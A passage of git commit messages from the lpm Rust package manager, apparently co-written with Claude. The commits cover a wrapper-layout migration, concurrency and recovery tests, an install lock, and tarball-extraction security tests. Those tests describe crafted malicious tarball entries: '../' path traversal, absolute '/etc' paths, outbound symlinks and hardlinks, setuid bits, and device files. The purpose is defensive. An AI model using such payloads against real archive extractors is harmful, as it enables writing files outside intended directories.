  which doesn't move under Tier 2.
- Phase 2 internal sibling-wrapper symlinks unchanged — both endpoints
  live inside `.lpm/wrappers/` so the relative `../../` shape is
  preserved.

Drive-by audit fixes folded in:
- #3 (bin-shim wrapper segment): `create_bin_links` now uses
  `pkg.wrapper_segment()` instead of hardcoding
  `format!("{safe}@{version}")`. Pre-fix, local-source deps with a
  `bin` field produced shims pointing at non-existent wrapper paths.
- #7 (Windows junction `..` normalization): added a lexical-clean
  helper inside `create_symlink_or_junction`'s Windows arm so the
  `../.lpm/wrappers/...` shape doesn't embed an unresolved `..`
  segment in the path handed to `cmd /c mklink /J`.

`cleanup_stale_entries` updates:
- Explicitly creates `node_modules/` (pre-Tier-2 the wrapper-root
  `create_dir_all` covered both via parent recursion; now they're
  disjoint paths).
- Skips dotfile entries (e.g., the new `.version` schema-tag) when
  sweeping stale wrappers.
- Writes `<wrapper-root>/.version` (D6) for forward-compat shape
  detection.

Test fixtures migrated to use `LayoutPaths` so they track production
semantics on any future shape change. 4949 workspace tests pass;
clippy --workspace -D warnings clean; cargo fmt clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(lpm-cli): rebuild.rs uses LayoutPaths + closes store-fallback hole (Phase 61.2)

Three things land together because they all touch `prepare_live_package_dir`:

D8a — store-fallback hard-error. Pre-Phase-61 the function returned
`Ok(store_path)` whenever the live probe fell through, letting the
caller chdir into canonical store bytes for a lifecycle script. On
macOS (clonefile, CoW) that was silent corruption on first write; on
Linux (hardlinks) the early `if !live.starts_with(store_root)` branch
skipped detach so the script ran against shared inodes. Either way, a
soundness violation. Post-fix the function returns `Err("...not linked
into project — refusing to run lifecycle script inside the store...")`
so failures are loud, actionable, and never corrupt the store.

Audit fix #4 — wrapper-segment shape. `live_package_dir` now takes a
`wrapper_id: Option<&str>` and computes the wrapper segment via
`LayoutPaths::wrapper_segment(name, version, wrapper_id)`. The same
helper `LinkTarget::wrapper_segment` delegates to (single source of
truth across the linker / rebuild / future doctor code paths). Pre-fix
the inline `format!("{safe}@{version}")` silently missed every
non-Registry source: a Directory / Link / Tarball / Git dep with a
lifecycle script had its wrapper probe fail and fall through to the
store. Post-fix `ScriptablePackage` carries the `wrapper_id` derived
from `lp.source` via `Source::source_id()`.

Audit fix #5 — test inversion. The pre-existing
`prepare_live_package_dir_does_not_detach_when_path_is_under_store_root`
test pinned the silent-fallback contract D8a inverts. Replaced with
`prepare_live_package_dir_errors_when_unlinked` asserting the new
`Err("...not linked into project...")` shape; canary-bytes-intact
assertion preserved.

Adjacent fix in `p6_triage_autoexec_reference.rs`: the test seeded
the store but not the wrapper, relying on the silent-fallback hole to
run lifecycle scripts. Added a `seed_wrapper` helper that materializes
`<project>/.lpm/wrappers/<seg>/node_modules/<name>/` from the store —
mirroring real post-install state. Pre-D8a the same fixture passed by
accident; the new state captures the actual contract.

`LayoutPaths::wrapper_segment` is the new cross-crate helper.
`LinkTarget::wrapper_segment` delegates to it so the two cannot drift.

4949 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(lpm-cli): layout-aware install_state + wrapper-layout migration (Phase 61.3)

Two pieces, both load-bearing per the v3 audit fix #2 / D8c:

1. Layout-aware freshness gate. `check_install_state` AND
   `try_mtime_fast_path` now consult
   `LayoutPaths::needs_layout_migration()` and force `up_to_date = false`
   when a populated legacy `node_modules/.lpm/` coexists with an empty
   `<project>/.lpm/wrappers/`. Without this gate, an upgrade-in-place
   user (binary upgraded but `node_modules/` not wiped) hash-matches
   on the install-hash check, the top-of-`main` fast lane
   short-circuits, and the migration code path never runs — they stay
   silently on the legacy layout until something else invalidates the
   hash.

2. Migration code path inside `lpm install`. Right after the fast-exit
   guard returns false, `migrate_legacy_wrapper_layout` checks the
   same predicate and (when true) wipes `node_modules/.lpm/` so the
   subsequent `cleanup_stale_entries` rebuilds at the new wrapper-root
   location. No rename-first attempt — cross-FS rename hazards
   (Linux containers, network FS, EXDEV) outweigh the saved relink
   cost, which Phase 61 makes faster anyway. Best-effort wipe; legacy-
   state quirks don't abort the install.

D9 — migration notice modes. Human-pretty mode prints a one-line
"migrating wrapper layout" notice via `output::info`; JSON / `--quiet`
/ non-TTY remain silent.

Tests added:
- `legacy_layout_present_forces_install_via_full_read` — hash matches
  but migration is owed → `up_to_date = false`.
- `legacy_layout_present_forces_install_via_mtime_fast_path` — same
  but with v2 mtime line; the mtime fast path bails to slow path.
- `empty_legacy_dir_does_not_force_install` — empty `.lpm/` doesn't
  count as legacy.
- `populated_new_layout_does_not_force_install` — both populated →
  migration considered complete; gate stops firing.
- `migrate_legacy_wrapper_layout_wipes_legacy_state` — happy path.
- `migrate_legacy_wrapper_layout_noop_when_not_owed` — no-op
  on a fresh project (doesn't synthesize directories).
- `migrate_legacy_wrapper_layout_noop_when_both_populated` —
  doesn't wipe on a mid-migration mixed state (real convergence
  happens via the next normal install).

4956 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(lpm-cli): doctor + gitignore + sandbox comment refresh (Phase 61.4 + 61.5 + 61.7)

61.4 — `lpm doctor` predicate becomes layout-aware. The legacy
`nm.exists() && nm.join(".lpm").exists()` probe is replaced with
`LayoutPaths::install_appears_healthy()` plus a `needs_layout_migration()`
gate. The doctor now distinguishes:
- Healthy { Isolated } → "exists with .lpm/wrappers store"
- Healthy { Hoisted } → "exists with hoisted layout"
- Healthy { Mixed } → warn + remediation
- NodeModulesPresentButNoStore → warn (existing message preserved)
- NoNodeModules → fail (existing message preserved)
- legacy layout detected (migration owed) → warn pointing the user
  at `lpm install` to converge

The hoisted-no-conflicts case (which the legacy predicate misreported
as "no .lpm store") now correctly classifies as healthy.

61.5 — `ensure_lpm_wrappers_gitignore` runtime helper. Mirrors
`ensure_skills_gitignore` (and the lpm-vault / npmrc siblings):
runtime "ensure once" pattern, idempotent, OpenOptions-append to
narrow the TOCTOU window. Marker is `.lpm/wrappers/`. Wired into the
install entry point alongside `migrate_legacy_wrapper_layout`.

61.7 — sandbox comment refresh. `landlock_rules.rs` explanatory
comment referenced `{project}/node_modules/.lpm/`; updated to mention
the post-Phase-61.1 `<project>/.lpm/wrappers/` location. The actual
ReadWrite rule at line 103 already grants `<project>/.lpm` so the
post-relayout location was already covered — comment-only change,
no functional impact.

Tests added:
- `ensure_lpm_wrappers_gitignore_appends_entry`
- `ensure_lpm_wrappers_gitignore_no_duplicate`
- `ensure_lpm_wrappers_gitignore_creates_when_no_gitignore`

4959 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean; no fancy-regex.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(lpm-linker): retarget legacy root symlinks + dotfile-aware layout predicates

Two audit fixes (round 2 of Phase 61 review):

CRITICAL — legacy root-symlink retarget. Pre-fix, the 61.3 migration
wiped `node_modules/.lpm/` but never touched root symlinks at
`node_modules/<pkg>` whose targets pointed into the legacy
wrapper-root shape. Phase 3's `if root_link.exists()` guard skipped
recreation, so an upgrade-in-place install left dangling symlinks —
the wrapper tree was wiped, but `node_modules/<pkg>` still pointed at
the old location and stayed broken.

Fix: `cleanup_stale_entries`'s root-symlink sweep gains a second
predicate. Beyond the existing "not in `direct_names`" stale-name
removal, it now ALSO removes any root symlink whose target traverses
a `.lpm/` segment NOT followed by `wrappers/` (legacy shape). Phase 3
recreates with the correct new target. Walks `Path::components()`
so the predicate is robust to path-separator style and to whether
the relative target leads with `.lpm/` (unscoped) or `../.lpm/`
(scoped). Self-refs (target = `..`, no `.lpm`) and workspace-member
symlinks (target outside `.lpm/`) are unaffected.

5 new tests:
- `cleanup_stale_entries_removes_legacy_shape_root_symlink`
- `cleanup_stale_entries_preserves_new_shape_root_symlink`
- `cleanup_stale_entries_preserves_workspace_member_symlink`
- `cleanup_stale_entries_preserves_self_reference_symlink`
- `link_finalize_retargets_legacy_root_symlink_after_migration`
  (end-to-end: post-migration install produces a working symlink
  resolving to a real `package.json`)

MEDIUM — `.version` schema-tag must not mask migration. The 61.1
`.version` write at the wrapper root happens BEFORE any wrapper is
materialized; pre-fix, `dir_is_nonempty` counted `.version` as
evidence of a populated layout, so a half-completed install (or any
state where the new root has only `.version`) would silently mask a
needed migration AND make `lpm doctor` report a healthy isolated
install when no wrappers actually existed. Both
`needs_layout_migration` and `install_appears_healthy` consume the
helper.

Fix: `dir_is_nonempty` now skips entries whose name starts with `.`.
Wrapper segments from `LayoutPaths::wrapper_segment` cannot produce
a leading-dot name (path-separator sanitizer is `replace('/', '+')`,
never `.`), so the dotfile filter cannot miss a real wrapper.

2 new tests:
- `needs_layout_migration_true_when_new_root_has_only_version_file`
- `install_appears_healthy_metadata_only_root_is_not_isolated`

4966 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(lpm-linker): scoped legacy-symlink retarget belt-and-braces

Audit follow-up: the scoped-name branch (`@scope/pkg`) of
`cleanup_stale_entries`'s root-symlink sweep traverses a separate
code path from the unscoped branch. The retarget fix in the prior
commit applies to both, but the existing test only exercised the
unscoped case. This test adds the scoped equivalent so a future
refactor that drops the legacy-shape predicate from the scoped
branch fails loud.

Setup: a `node_modules/@types/node` symlink whose target is the
pre-Phase-61.1 scoped shape (`../.lpm/<seg>/node_modules/@types/node`,
no `wrappers/` segment). After cleanup the legacy symlink must be
removed so Phase 3 recreates it pointing at the new
`../../.lpm/wrappers/<seg>/...` two-level shape.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 14, 2026
…low gate

Ships the 10 cross-command flow tests enumerated in v2 baseline,
flips EXPECT_FULL_V2_FLOWS_BACKFILL to true so future flow drops
hard-fail the audit.

Each flow exercises a real-user multi-command sequence and asserts
the state-transfer claim that ties the commands together — what
command A leaves on disk / in the keychain / in the lockfile is the
input command B reads. Single-command tests assert each step in
isolation; flow tests catch state-shape mismatches between steps.

Flows shipped:
- install → patch → patch-commit → install (patch persistence)
- migrate → install → audit (lockfile round-trips)
- install → rebuild → approve-scripts → rebuild (approval lifecycle)
- doctor --fix → install (fix survives install)
- add → install → graph (added dep visible)
- install → upgrade --major → audit (envelope shape)
- token-rotate → publish --dry-run --check (token hand-off)
- publish --dry-run --check → publish (target agreement)
- install -g → run shimmed binary → uninstall -g (shim lifecycle)
- env push → env pull cross-machine (round-trip — scoped to local
  smoke until a cross-machine harness lands)

Several flows had their assertions scoped narrower than the original
"catches" claim:
- Flow #6 (rebuild lifecycle): rebuild --policy=deny ignores the
  v2 object form of trustedDependencies that approve-scripts writes
  — a real contract gap, filed as private finding #75. The flow
  asserts the manifest mutation; rebuild #2 only checks envelope
  health.
- Flow #4 (upgrade major audit): the workflow tier's MockRegistry
  helpers don't mount GET /api/registry/{name} per-package (only
  the batch endpoint), so upgrade's candidate selection finds no
  candidates. Flow asserts envelope shape; tighten when the mock
  grows the per-package GET.
- Flow #7 (env push/pull cross-machine): proper round-trip needs a
  shared-vault-state test harness that doesn't exist yet. Flow
  smokes per-machine env state isolation; promote when the harness
  lands.
- Flow #8 (install -g): gracefully degrades when install-g doesn't
  emit a shim on the test runner (cli-binary tier owns the strict
  contract).

Run results: 10/10 flow tests pass, all 10 v2 audit tests pass,
full lpm-workflows suite green (623/623), clippy clean, fmt clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 14, 2026
…htening, cross-machine vault harness

Six focused follow-ups against the v2 coverage matrix.

JSON contract depth promotions (SemanticAsserts → InstaSnapshot):

- id 4  lpm whoami       — insta snapshot added to
  `whoami_recovers_session_from_refresh_token_only` in
  `auth_lifecycle.rs`. Pins the envelope shape under a refresh-only
  session recovery.
- id 97 lpm env ls/list  — insta snapshot added to
  `env_list_json_envelope_carries_keys` in `env_local.rs`. The
  envelope is a flat key→masked-value map; locked with `sort_maps`
  for stable ordering across `preserve_order`-enabled serde_json.
- id 101 lpm env push/pull — insta snapshot added to the GitLab
  OIDC pull --json test in `env_vault.rs`. Pins the {env, count,
  vars} shape after the LPM_OIDC_TOKEN canonical-input contract.

JSON contract depth promotions (None → SemanticAsserts):

- id 74 lpm approve-scripts `<pkg>` — verified the named `<pkg>`
  form test reads `parsed["dry_run"]` and `parsed["approved_count"]`
  via `serde_json::from_str`. Audited the other 34 None rows — most
  are either commands that don't emit JSON envelopes (completions,
  dev/tunnel streams, login/logout) or where the named sub-form
  isn't directly covered by an envelope-reading test fn.

Cross-command flow #4 (install → upgrade --major → audit) tightened:

- Lifted the private `mount_upgrade_package` from `upgrade.rs` into
  the shared `MockRegistry::with_full_package_metadata` helper. It
  mounts the per-package GET (`/api/registry/{name}` + the
  npm-direct `/{name}` path) AND the batch-metadata POST from one
  metadata document, with optional `None` tarball-bytes for the
  fail-tarball case. `lpm upgrade`'s candidate selector reads the
  GET endpoint; the install fallback reads batch-metadata; the
  shared helper makes both observable from a single call.
- Tightened the rebuild #2 assertion in flow #4 to require the
  upgrade --major --dry-run envelope mentions both `2.0.0` and the
  scoped package name. Was previously gated behind "shared mount
  missing" — gate removed.

Finding #75 (rebuild --policy=deny ignores object-form
trustedDependencies) — RETRACTED:

- `TrustedDependencies` in lpm-workspace is `#[serde(untagged)]`
  over both `Vec<String>` (Legacy) and `HashMap<String, Binding>`
  (Rich). `evaluate_trust` in rebuild.rs routes through
  `matches_strict`, which prefers the concrete `name@version` key
  and falls back to the `name@*` preserve key. Object form is
  already supported.
- The empty `packages[]` flow #6 originally observed was
  `TrustMatch::BindingDrift`: the fixture's synthetic
  `"sha256-flow-script-hash"` did not match the real
  `compute_script_hash(store_dir)` value rebuild computes on disk.
  Synthetic vs. recomputed hash divergence, not a missing reader.
- Fixed in flow #6 by computing the real script_hash via
  `lpm_security::script_hash::compute_script_hash` and propagating
  it through `.lpm/build-state.json` → approve-scripts → manifest.
  Rebuild #2 now asserts `packages[]` contains `scripted-pkg@1.0.0`
  with `trusted: true`.

Cross-command flow #7 (env push → env pull cross-machine) — full
byte-equality round-trip now lands:

- Added `MockRegistry::with_stateful_personal_sync(vault_id,
  bearer)` to share `Arc<Mutex<Option<StoredSyncBlob>>>` between
  POST and GET handlers on `/api/vaults/{vault_id}/sync`. POST
  captures encryptedBlob + wrappedKey + bumps the version; GET
  returns the stored payload signed with the bearer's HMAC. A
  fresh GET before any POST returns 404 — the natural "machine B
  pulls before machine A pushed" shape.
- Flow #7 now drives two TempProjects sharing this mock. Both
  HOMEs are seeded with the same `<HOME>/.lpm/.vault-key` (32-byte
  hex, the cryptographic outcome that real pairing produces) +
  the same paired session bearer. Machine A: `env set` → `env push`.
  Machine B: `env pull` → `env get --reveal`. The revealed
  plaintext must byte-equal the value machine A pushed.

scenarios_by_file partitions populated for shared test files:

- id 83 lpm run `<script>`            — run.rs: 14
- id 84 lpm run --filter / --all / --affected — run.rs: 7
- id 87 lpm lint                      — tools.rs: 5
- id 88 lpm fmt (write)               — tools.rs: 3
- id 89 lpm fmt --check               — tools.rs: 1
- id 91 lpm test                      — tools.rs: 7
- id 96 lpm env init                  — env_local.rs: 1
- id 98 lpm env set/get/delete        — env_local.rs: 6
- id 99 lpm env import/export/print/copy — env_local.rs: 4
- id 100 lpm env diff/validate/check  — env_local.rs: 4

Full CI gate green (workspace target, separate CARGO_TARGET_DIR):

- cargo clippy --workspace --all-targets -- -D warnings  clean
- cargo fmt --check                                       clean
- grep -r 'fancy-regex' crates/*/Cargo.toml              (none)
- cargo build --workspace                                 clean
- cargo nextest run --workspace --exclude lpm-integration-tests
                                                          6397/6397 pass

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 14, 2026
…ix (#58)

* test(workflows): pin concurrency + recovery contracts for lpm install

Adds tests/workflows/tests/install_concurrency.rs with 13 falsifiable
tests covering production failure modes that had zero coverage:

Category A — process racing:
  * two concurrent installs on same project (pins finding-#77 floor)
  * install + concurrent store-clean serialize via shared/exclusive
    store_lock (probed via try_with_exclusive_lock on the actual
    lock file, not a directory-existence proxy)
  * two concurrent `lpm install -g` via global_tx_lock — proves
    final manifest + WAL coherence under serialized commits

Category B — interruption recovery:
  * kill mid-tarball-fetch leaves no .lpm/install-hash
  * next `lpm install` converges to a coherent end state

Category C — network faults:
  * tarball 503 → 200 succeeds after retry (counting Respond impl)
  * metadata 404 fails immediately without retry (<2s wall-clock)

Category D — filesystem faults:
  * readonly project dir fails with actionable error (no panic);
    POSIX-only via #[cfg(unix)], RAII guard restores permissions
  * `<project>/.lpm` planted as a regular file fails clearly

Category E — partial state recovery:
  * stale install-hash triggers re-resolve + refetch
  * partial node_modules re-links to full state
  * truncated lpm.lockb either recovers or fails cleanly (no panic)

Category F — WAL recovery hook:
  * torn WAL tail (3 garbage bytes) gets truncated by the dispatcher's
    recovery hook before the command runs; idempotent on re-invocation

Support helper refactor (same commit so the new helper has callers):
  * extracts env-isolation set into `LpmEnvSink` trait +
    `apply_lpm_env(cmd, project)` shared by `lpm()` (assert_cmd) and
    the new `lpm_spawnable()` / `lpm_spawnable_with_registry()`
    (std::process::Command, supports Child::kill())
  * trait impl on both Command variants ensures the two helpers
    cannot drift on the ~30 env knobs that gate test isolation

Surfaced findings during this work:
  * #77 — no project-level install lock: concurrent installs silently
    drop one side's work AND/OR fail with atomic-rename races (3
    observed failure modes documented in findings.md). Fix shape:
    LpmRoot::project_install_lock + with_exclusive_lock_async wrap.
  * #78 — retry-backoff has no test-friendly knob; retry-exhaustion
    tests take 15s+. Fix shape: LPM_RETRY_BACKOFF_MS_OVERRIDE env in
    debug builds.

CI gate locally green:
  clippy --workspace --all-targets -- -D warnings: clean
  cargo fmt --check: clean
  fancy-regex ban: empty
  cargo build --workspace: clean
  cargo nextest run --workspace --exclude lpm-integration-tests:
      6439 passed, 7 skipped, 1 leaky (pre-existing)

Deferred (filed under "next session" in the followup plan):
  B.3 (kill doesn't tear lockfile) — subsumed by B.1/B.2
  B.4 (panic injection) — needs LPM_TEST_PANIC_AT env hook
  C.2 (retry exhaustion) — blocked by finding #78
  C.3 (truncated body) — needs custom Respond with Content-Length mismatch
  D.3 (disk-full simulation) — no portable mechanism
  F.2, F.3 (orphan WAL, torn WAL with real records) — needs
    framed-WAL construction helpers

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(workflows): pin lpm.lock well-formedness + recovery skip-on-contention

Closes B.3 and F.2 of the concurrency tranche — 13 → 15 tests, meeting
the "≥15 of 21" acceptance criterion for Item 2.

B.3 — `install_killed_mid_pipeline_leaves_well_formed_or_absent_lockfile`:
Exercises two SIGKILL windows on the install pipeline — fresh project
and project with a committed lpm.lock from a prior install. After each
kill, asserts the on-disk lpm.lock is either absent OR parses as TOML.
Never half-written. Adds `toml = { workspace = true }` as a workflow-
tests dev-dep for the parse assertion. Helper
`assert_lockfile_well_formed_or_absent` shared between both windows.

F.2 — `lpm_command_skips_recovery_when_another_lpm_holds_global_tx_lock`:
Validates the dispatcher's `try_with_exclusive_lock` idempotent-skip
path at `main.rs:2531`. A background thread acquires `global_tx_lock`
via `lpm_common::with_exclusive_lock` and blocks on a channel. With
the lock held, runs `lpm global list` against a project with a torn-
WAL prefix — asserts the WAL bytes are UNCHANGED (skip arm fired,
recovery did not run). Then releases the lock and re-runs; asserts
the WAL is now truncated (recovery defers correctly to the next
lock-free invocation). Exercises both branches of the `try_with_
exclusive_lock` Ok(None) / Ok(Some) arm.

CI gate locally green:
  cargo clippy --workspace --all-targets -- -D warnings: clean
  cargo fmt --check: clean
  cargo nextest run --workspace --exclude lpm-integration-tests:
      6441/6441 passed, 7 skipped
  5x parallel re-run of install_concurrency: 15/15 stable each run

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(workflows): pin truncated-tarball + orphan-WAL recovery contracts

Two new tests in tests/workflows/tests/install_concurrency.rs:

- C.3 tarball_connection_dropped_mid_body_fails_or_retries: a custom
  wiremock Respond impl serves half a tarball with a Content-Length
  header naming the full length. Pins the install pipeline's
  retry-then-fail behavior on transport-class failures (~14s wall-clock
  for the full 4-attempt retry schedule). Hyper 1.9 server-side panics
  on the Content-Length lie, dropping the connection — a valid surrogate
  for a broken upstream / CDN dropping mid-body. Surfaced 8 tarball GETs
  per install (deterministic, 3-of-3 reproducer), explained by two
  distinct download_tarball_* call sites in install.rs each running the
  4-attempt retry budget.

- F.3 lpm_command_with_orphan_pending_tx_emits_recovery_banner: plants
  both halves of an orphan transaction (WAL Intent record without
  matching Commit/Abort + matching [pending.<pkg>] row in manifest.toml
  pointing at a non-existent install root) and asserts the dispatcher's
  recovery hook fires the RolledBack banner from main.rs:2543. Sets
  RUST_LOG=lpm=info to lift the default lpm=warn filter so the
  tracing::info! line surfaces. Adds lpm-global as a workflow dev-dep
  for WalWriter / IntentPayload / write_for. Pins post-state: orphan
  pending row gone, no spurious active row.

Together these close the C.3 and F.3 gaps in Item 2 of the test
coverage follow-up plan: 17/21 scenarios pinned (was 15/21). The four
remaining items all need source-side hooks (LPM_TEST_PANIC_AT,
LPM_RETRY_BACKOFF_MS_OVERRIDE, container infra) and are out of scope
for this tranche.

Full CI gate green: clippy clean, fmt clean, fancy-regex empty,
6443/6443 nextest pass (was 6441 pre-tranche).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(workflows): pin tarball-extraction security contracts at install tier

New file tests/workflows/tests/tarball_security.rs ships phase 1 of
Item 3 (tarball-extraction security): 5 of 10 planned tests covering
the most distinct security contracts at the install-pipeline tier.
Each test constructs its malicious tarball in-line via tar::Builder
(no checked-in fixtures), serves it through MockRegistry, and runs
lpm install end-to-end so any pipeline-level regression that bypasses
the extractor's hardening is caught.

Tests landed:

- #1 tarball_with_dot_dot_path_entry_is_rejected_by_install — pokes
  package/../escape.txt into the raw tar header bytes; install fails
  with "path traversal detected"; outside sentinel never created.
- #3 tarball_with_absolute_path_entry_is_normalized_to_relative_under_package_dir
  — renamed from "rejected" to reflect actual contract. The extractor's
  strip_first_component consumes the RootDir; an entry like
  /etc/lpm-pwned.txt extracts as node_modules/<pkg>/etc/lpm-pwned.txt.
  Install SUCCEEDS; literal /etc/lpm-pwned.txt is never written.
  Defensible: malformed-but-safe input normalized rather than refused.
- #2 tarball_with_symlink_to_outside_path_is_silently_skipped —
  renamed. The is_file() gate at lib.rs:398 silently drops symlinks;
  install succeeds with byte-identical outside sentinel.
- #5 tarball_with_hard_link_to_outside_file_is_silently_skipped —
  renamed. Same is_file() gate; hardlinks silently skipped; outside
  victim file unmodified.
- #8 tarball_with_setuid_executable_extracts_with_setuid_bit_stripped
  (POSIX-only) — tarball entry mode 0o4755 extracts as 0o755. SUID,
  SGID, and sticky bits all cleared via set_preserve_permissions(false)
  + the explicit `0o644 | exec_bits` mode set after write. Exec bits
  preserved.

Three tests carry a "plan-vs-actual" docstring section explaining why
the rename is defensible — the actual extractor contract differs from
the plan's prescribed phrasing in safe ways, not in regression-grade
ways. No findings filed.

Phase 2 (5 remaining tests: Unicode normalization, device file, FIFO,
zero-byte sanity, OS-max path) is deferred to a follow-up tranche
with rationale + lift estimate documented in the plan. None blocks
phase 1 acceptance.

Pre-merge gate green: clippy clean, fmt clean, fancy-regex empty,
6448/6448 nextest pass (was 6443; +5 for the new tests). 0.18s wall-
clock for the full file.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(install): per-project lock prevents concurrent-install data loss

Closes finding #77. Two `lpm install <pkg>` invocations on the same
project no longer race on the manifest snapshot+commit window.

Pre-fix, both processes acquired only a SHARED store_lock and proceeded
in parallel. Each opened its own per-process ManifestTransaction
snapshot of the pre-edit package.json, staged its own dep on top, and
ran the install pipeline. Whoever wrote package.json + lpm.lock last
won; the other process's edits — including its node_modules link —
silently vanished. Both processes still exited 0 with success-path
output. CI scripts that ran two installs in parallel saw no signal of
the data loss.

The fix introduces:

- crates/lpm-common/src/paths.rs::project_install_lock(project_dir):
  free helper returning <project_dir>/.lpm/.install.lock. Re-exported
  from crates/lpm-common/src/lib.rs.

- run_add_packages and run_install_filtered_add in
  crates/lpm-cli/src/commands/install.rs now wrap the snapshot →
  stage → install → finalize → commit window in
  with_exclusive_lock_async against the project lock. The lock is
  per-project (no cross-project contention) and held across all
  ?-early-exits via the async block's return.

For the workspace path, the lock sits at the discovered workspace root
(not per-member) so two concurrent `lpm install --filter <member>`
invocations on the same workspace serialize without per-member
deadlock-ordering complexity.

run_with_options (the inner install pipeline) does NOT acquire this
lock — it's called from inside both run_add_packages's wrap and from
many other commands; double-acquiring the same fd-lock would deadlock
in-process.

Deferred (phase 2, not exercised by A.1): lpm add (add.rs:723-904)
has a similar 180-line transaction with recursive Swift handling.
Wrapping it is invasive and the race surface is theoretical (users
don't typically run `lpm add` and `lpm install` concurrently). Defer
to a separate tranche if a concurrent `lpm add` × `lpm install` race
is ever observed.

Test contract tightening (bug-first per CLAUDE.md):
two_concurrent_installs_on_same_project_leave_well_formed_manifest in
tests/workflows/tests/install_concurrency.rs went from "at-least-one
survives + manifest is well-formed JSON" (the floor) to "BOTH installs
succeed, BOTH packages present in package.json deps, BOTH packages
linked in node_modules/" (the contract). Pre-fix: 1/1 fail (pkg-b
silently dropped). Post-fix: 5/5 pass with no flakes (~1.2s wall-clock
each — install B observes pkg-a's commit and reports "Resolved 2
packages").

Pre-merge gate green: clippy --workspace --all-targets clean, fmt
clean, fancy-regex empty, 6448/6448 nextest pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(registry): test-only retry-backoff override env knob

Closes finding #78 + lands C.2 (`tarball_503_exhausts_retries_fails_with_http_status`).

Pre-fix, retry-exhaustion tests were blocked: the registry client's
backoff schedule (1+2+4+8s, capped at 10s) made every retry-exhaustion
test take ~15s per fetch site (~28s with the install pipeline's 2
distinct download_tarball_* call sites). MAX_RETRIES, RETRY_BASE_DELAY,
and RETRY_MAX_DELAY are private const with no env override. C.2
therefore had to be #[ignore]-gated behind LPM_RUN_SLOW_TESTS=1, and
the retry-exhaustion contract went unproven on `cargo nextest run`.

The fix introduces:

- crates/lpm-registry/src/client.rs::backoff_override(): reads
  LPM_RETRY_BACKOFF_MS_OVERRIDE (a u64 ms value) gated by
  cfg!(debug_assertions) || LPM_TEST_MODE=1. Returns Some(Duration)
  when both conditions hold; None otherwise. Production retry policy
  is immune — release builds without LPM_TEST_MODE=1 silently ignore
  the env.

- backoff_delay(attempt) consults the override before computing the
  exponential schedule.

- The two 429 Retry-After sleep sites also consult the override so a
  future 429-flood retry-exhaustion test wouldn't hang on the
  server-supplied header.

C.2 test landed alongside (bug-first per CLAUDE.md):

- Mock returns 503 on every tarball request — no recovery path.
- Test sets LPM_RETRY_BACKOFF_MS_OVERRIDE=10 on the lpm subprocess.
- Asserts: install fails non-zero, no panic, ≥4 attempts (proves the
  retry loop fired), elapsed < 2s (load-bearing — without the knob
  this fails at ~14s), stderr contains an actionable HTTP-class
  noun (503 / status / http / network / etc).
- Surfaces 8 tarball GETs per install (4 attempts × 2 distinct
  download_tarball_* call sites — matches C.3's observation).

Pre-fix verification: same C.2 against the unfixed client.rs failed
on the elapsed assertion at 14.04s (knob ignored). Post-fix: passes
in 1.6s cold / 0.1s warm. 5/5 passes with no flakes.

Pre-merge gate green: clippy --workspace --all-targets clean, fmt
clean, fancy-regex empty, 6449/6449 nextest pass (was 6448 pre-fix;
+1 for C.2).

Item 2 of the test-coverage-followup-plan now at 18/21 (was 17/21).
Both findings #77 and #78 fixed in production.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(workflows): tarball-security phase 2 — Unicode, device, FIFO, zero-byte, long-path

Adds 5 more tests to tarball_security.rs, completing Item 3 of the
test-coverage follow-up plan. Each test pins the actual extractor
contract under malicious-or-edge-case tarball shapes that reach the
install pipeline through MockRegistry.

Tests landed:

- #4 tarball_with_unicode_lookalike_parent_dir_extracts_safely_as_literal_bytes
  — renamed from "_normalization_traversal_rejected" to reflect the
  actual contract. Tarball entry path uses full-width dots U+FF0E `..`
  (bytewise NOT ASCII `..`). Component::ParentDir is byte-exact, so
  `..` becomes Component::Normal. Install SUCCEEDS; `..` materializes
  as a literal directory under node_modules/<pkg>/; outside sentinel
  byte-identical. Defensible because Path::components() doesn't
  NFKC-normalize on POSIX.

- #6 tarball_with_character_device_entry_is_silently_skipped
  (POSIX-only). EntryType::Char with /dev/null-shaped major/minor.
  Same is_file() gate as symlinks/hardlinks — silently skipped.
  Install SUCCEEDS; no device file at the expected path.

- #7 tarball_with_fifo_entry_is_silently_skipped (POSIX-only).
  EntryType::Fifo. Same posture as #6.

- #9 tarball_with_zero_byte_regular_file_extracts_as_empty_file.
  Sanity check that empty files still extract correctly (legitimate
  npm shape: .gitkeep, license placeholders).

- #10 tarball_with_single_path_component_exceeding_name_max_fails_cleanly.
  300-byte single-component name, well over POSIX NAME_MAX=255. Tar
  wire format succeeds via GNU long-name extension; the FILESYSTEM
  rejects on extraction (ENAMETOOLONG). Extractor wraps as
  LpmError::Io → install fails non-zero with the OS error visible
  and an actionable noun in stderr.

Three of the five tests are renamed to reflect actual extractor
contract vs the plan's prescribed phrasing — same "plan-vs-actual"
docstring pattern as phase 1. No findings filed; all 10 contracts
across phase 1 + 2 are defensible-as-implemented.

Pre-merge gate green: clippy --workspace --all-targets clean, fmt
